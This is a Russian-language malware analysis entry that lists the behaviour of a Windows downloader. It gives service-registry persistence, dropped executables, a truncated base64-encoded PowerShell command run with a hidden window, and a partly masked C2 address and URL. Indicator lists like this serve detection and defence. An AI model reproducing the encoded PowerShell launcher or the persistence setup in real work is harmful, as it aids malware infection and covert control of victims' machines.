Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\netiohlp] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\netiohlp] 'ImagePath' = '"%WINDIR%\SysWOW64\perfnet\netiohlp.exe"'
- 'netiohlp' "%WINDIR%\SysWOW64\perfnet\netiohlp.exe"
- 'netiohlp' %WINDIR%\SysWOW64\perfnet\netiohlp.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTADIANgBfAGQANAA0AD0AKAAnAFcAJwArACgAJwBuACcAKwAnAF8AYgAnACkAKwAoACcAOAAnACsAJwA2AGEAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFQAZQBNAFAAXAB3AE8AcgBEAFwAMgAwAD...
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\metadata\f0accf77cdcbff39f6191887f6d2d357
- %WINDIR%\serviceprofiles\networkservice\appdata\locallow\microsoft\cryptneturlcache\content\f0accf77cdcbff39f6191887f6d2d357
- %TEMP%\word\2019\s1xi8fyw.exe
- %WINDIR%\syswow64\perfnet\netiohlp.exe
- %TEMP%\word\2019\s1xi8fyw.exe в %WINDIR%\syswow64\perfnet\netiohlp.exe
- '17#.#1.218.65':80
- http://17#.#1.218.65/UYTAwSEn7Y/M675/bDJgqfo/oI1yUEo8S6r78yu3m00/MFYGrxSKAoJ/
- DNS ASK in####ricatoday.com
- '%TEMP%\word\2019\s1xi8fyw.exe'
- '%WINDIR%\syswow64\perfnet\netiohlp.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABTADIANgBfAGQANAA0AD0AKAAnAFcAJwArACgAJwBuACcAKwAnAF8AYgAnACkAKwAoACcAOAAnACsAJwA2AGEAJwApACkAOwAmACgAJwBuAGUAJwArACcAdwAtAGkAdABlAG0AJwApACAAJABlAE4AdgA6AFQAZQBNAFAAXAB3AE8AcgBEAFwAMgAwAD...' (со скрытым окном)